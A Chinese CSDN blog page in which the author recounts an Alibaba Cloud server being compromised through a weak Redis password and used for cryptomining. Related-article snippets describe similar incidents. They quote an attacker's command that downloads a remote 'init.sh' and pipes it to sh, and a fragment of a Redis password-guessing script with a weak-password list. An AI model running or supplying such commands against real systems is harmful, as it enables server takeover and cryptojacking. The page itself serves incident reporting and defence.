阿里云服务器被Redis弱密码漏洞挖矿

最新推荐文章于 2024-05-04 10:15:00 发布
最新推荐文章于 2024-05-04 10:15:00 发布
阅读量408 收藏
点赞数 2
分类专栏: 文章标签: redis linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qfxl0724/article/details/126279688
版权

我尝试了网上的极多的解决方案,但是都没用了,这些黑客的手段也是不断更新迭代。定时任务我也改了,删了,再到病毒文件清空了,但是都无所事事,进程杀不死,CPU长时间100%。

 

 重启了三次,没办法,最后是通过重装了系统才解决的,就短短的半个小时,就被渗透,这速度。。。总之损失了很多文件,配置,数据库也没有被及时备份,唉,之前被SSH远程攻击上万次都没被打,被redis的漏洞半个小时沦陷,长个记性,以后注意!

清风亦思雨
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
由于redis暴露外网未设置密码挖矿问题处理
ZhengXinMing1998的博客
05-24 892
一、问题查找 接到腾讯云短信提醒,服务器可能被植入了挖矿程序。 1.于是top查看cpu占用,发现一个名为java8_8的程序会定时隔一段时间就占用系统特别高的cpu 2.检查系统中的定时任务 发现/etc/crontab文件中出现了可疑的定时任务,通过ip查找发现ip地址来自美国 3.检查系统启动项,发现启动项中确有java8_8-server,并且状态位enable的 二、问题处理 1.清除系统该进行的启动项:systemctl disable 服务名 2.查看进程的存储目录,rm -rf /
解决redislinux(centos)下的一个挖矿漏洞
qq_34870166的博客
01-24 5499
redis挖矿漏洞
记一次阿里云服务器Redis被【挖矿病毒crypto和pnscan】攻击的case,附带解决方案
最新发布
A_991128a的博客
05-04 981
因为入门学习阶段知识点比较杂,所以我讲得比较笼统,大家如果有不懂的地方可以找我咨询,我保证知无不言言无不尽,需要相关资料也可以找我要,我的网盘里一大堆资料都在吃灰呢。④ CTF大赛、web安全、渗透测试方面的视频(适合小白学习)①1000+CTF历届题库(主流和经典的应该都有了)③项目源码(四五十个有趣且经典的练手项目及源码)⑦ 2023密码学/隐身术/PWN技术手册大全。⑤ 网络安全学习路线图(告别不入流的学习)⑥ CTF/渗透测试工具镜像文件大全。②CTF技术文档(最全中文版)
记一次因为redis漏洞挖矿
啊鹏的博客
10-01 2824
问题:CPU一直100%,top看不到进程,无从下手,阿里云无限报异常文件下载,以及linux共享库预加载配置文件被篡改。 经百度,到解决办法: 参考文档:https://blog.csdn.net/leisure_life/article/details/82899703 https://blog.csdn.net/leisure_life/article/details/82905256...
Redis未授权漏洞复现,利用其实现的挖矿蠕虫脚本分析
qq_53689523的博客
05-05 842
Redis未授权漏洞复现 挖矿蠕虫脚本分析 恶意代码分析实例
【经历毒打,非技术文章】被redis密码入侵
深渊码头
03-14 6023
昨天和凌晨自己的两台服务器都中毒了,原因是使用我的redis密码入侵的; 执行了这一串代码,凌晨2点系统告诉我系统被植入病毒了,我修修补补了一下,以为另一台服务器不会被植入的,结果4点多我的集群就中了。哎,要相信直觉 写了一个定时任务叫 dog 我记得他们的时间是 20 ,30,45,55都去执行下载文件的 会删除所有redis数据 病毒去下载奇奇怪怪的玩意下来,不过下载完了会自删除,和我另一台服务器中毒执行的不一样,有空在折腾吧,不影响我的操作,打算钓鱼一...
Redis阿里云服务器上的安装与使用
01-09
1.远程连接阿里云服务器 2.安装Redis apt install redis-server 3.修改配置信息 (由于Redis阿里云默认是不开启的,因为redis-server 默认配置绑定的 IP 是 IPv6, 操作系统模式 IP v4) 进入redis  进入vim...
阿里云服务器安装配置redis的方法并且加入到开机启动(推荐)
09-09
在本文中,我们将详细介绍如何在阿里云服务器上安装和配置Redis,并将其设置为开机启动服务。Redis是一款开源的键值存储系统,常用于数据库、缓存和消息中间件,其高性能和灵活性使其在IT领域广泛应用。 1. **安装...
Redis集群/空密码问题整改
11-15
Redis集群/空密码问题整改 1.密码整改 使用redis安装用户,在命令行连接上redis集群后,执行命令:config set requirepass 【自定义的强密码】,如: config set requirepass mypassword@#75@~ 然后执行 config ...
阿里云 Redis 开发规范
01-07
本文主要介绍在使用阿里云 Redis 的开发规范,从下面几个方面进行说明。 键值设计 命令使用 客户端使用 相关工具 通过本文的介绍可以减少使用 Redis 过程带来的问题。 一、键值设计 1、key 名设计 可读性和可管理性 ...
排查通过服务器中 redis漏洞植入 pnscan 病毒进行挖矿
pkyShare 的博客
05-17 826
1 描述   最近买了一台云服务器进行学习研究,然后装了 redis,怎想到了某天晚上 22:00 开始服务器就卡顿了,输入命令半天没响应,然后重新连接则多次超时。最后连接上去了,输入命令 uptime ,显示如下图:   我的服务器是 1 核心的,信息显示有另一个用户,而且后面三个参数都超过了 1,表示当前 CPU 严重过载。   再在云服务器管理页面查看可视化界面,如下图:   没遇到过这种情况,然后就提交了工单叫云服务器人员帮忙处理。 2 结果与分析   结果是攻击者通过 redis 的安全漏洞植入
CPU被挖矿Redis竟是内鬼
m0_67900727的博客
03-17 195
却说这一日,Redis正如往常一般工作,不久便收到了一条SAVE命令。 虽说这Redis常被用来当做缓存,数据只存在于内存中,却也能通过SAVE命令将内存中的数据保存到磁盘文件中以便持久化存储。 图片 只见Redis刚打开文件,准备写入,不知何处突然冲出几个大汉将其擒住。 到底是怎么回事?Redis一脸懵。 这事还得要从一个月之前说起。 挖矿病毒 前情回顾:CPU深夜狂飙,一帮大佬都傻眼了··· 一个月前,突如其来的警报声打破了Linux帝国夜晚的宁静,CPU占用率突然飙升,却不知
记一次因redis未授权访问漏洞被攻击进行挖矿
12-05 896
一、问题描述 redis存储的业务数据被清空,且被注入未知的url下载链接: cur -fsSL http://185.181.10.234/E5DB0E07C3D7BE80V520/init.sh |sh 百度该链接后,发现是这是一段带有恶意链接脚本,进行恶意shell脚本下载,从而实现远程代码攻击,并进行挖矿行为。 二、分析 分析参考链接: https://www.freebuf.com/c...
阿里云服务器挖矿攻击,redis密码访问进入
junh_422的博客
12-09 622
1.查找进程top,并删除挖矿进程 top kill -9 Pid 2.查询文件所在位置 find / -name 'processname' 3.进入到文件目录按时间顺序查找文件 ls -lt //按时间排序 4.删除植入文件 rm -rf newbat.sh //报错 rm: cannot remove ‘newdat.sh’: Operation not permitted 5.即使你是root权限,但是你仍然也无法删除,需要进行操作 lsattr newda...
linux系统redis密码修改,redis未授权口令检测脚本(redis未授权访问漏洞,利用redis写webshell)...
weixin_31916125的博客
05-09 456
以下如有雷同,不胜荣幸*---示例代码!!!!!----*/#!/usr/bin/envpython#_*_coding:utf-8_*_importsocketimportsysPASSWORD_DIC=['redis','root','oracle','password','p@aaw0rd','abc123!','123456','admin']defcheck(ip,...
由于Redis后门漏洞导致服务器被注入挖矿脚本解决过程
JolyouLu的博客
05-07 1557
由于Redis后门漏洞导致服务器被注入挖矿脚本解决过程 事件描述 某一天的早晨,我还是像往常一样搭着公交车开启打工仔的一天,一早8.30就到办公室了,坐着玩手机等上班,就这这时突然我组长飞快的回来办公室,回来就说快看看阿里云后台服务,服务是不是挂掉了,我当时就纳闷了一大早的流量不大怎么就宕机了呢,不一会我组长收到了阿里云短信通知监测到恶意脚本,接下来就是脚本的查找 前期处理 首先是通过阿里云的控制台发现,查看到恶意的进程PID,通过ps -ef | greap 5724的确看到了当前进程,前期处理我只
redis未授权导致服务器被挖矿分析(20220119)
fr1d4st的博客
01-27 2729
文章目录@[toc]0x00 背景0x01 现象0x02 临时处理0x03 溯源 0x00 背景 20220119收到阿里云报警短信 【阿里云】尊敬的******:云盾云安全中心检测到您的服务器:xx.xx.xx.xx(**)出现了紧急安全事件:挖矿程序,建议您立即登录云安全中心控制台-安全告警处理http://a.aliyun.com/f1. 进行处理 。 登录阿里云控制台后发现有多条异常记录 恶意脚本代码执行(curl -s -L http://xx.xx.xx.xx/f220115rr/
H2Miner变种,利用Redis漏洞入侵云服务器wa矿
热门推荐
China Honker 博客
01-12 114万+
H2Miner变种木马入侵后会下载挖矿木马,通过安装定时任务持久化,通过SSH复用连接进行横向移动感染。该程序由GO语言开发,通过还原后的函数名进行对比,可知其是H2Miner此前的kinsing文件变种,并且与http[:]//45.10.88.124/kinsing下载得到的文件一致。Redis 4.x/5.x 版本存在主从同步命令执行漏洞(CNVD-2019-21763),攻击者通过构造特定的请求实现漏洞利用,成功利用漏洞可在目标服务器上实现Getshell,该漏洞风险较高,且漏洞利用方式已被公开。
阿里云服务器养只大虫子:Redis漏洞挖矿造成CPU100%的解决办法
Sail__的专栏
01-17 3762
之前在9月份的时候,我的阿里云服务器出现过一次被挖矿的情况,也是cpu爆满,后来发现是因为mysql的漏洞。 当时抓着mysql一顿处理,新建用户,强密码,设权限,nologin,可算是正常了。 这几天又再次出现了被挖矿的情况,今天算是解决了,舒服,下面说下情况。 表现:服务器上的web应用一场的慢,ssh登陆进去top -c查看如下: COMMAN处的[UWcUml]占用cpu100...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

清风亦思雨

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值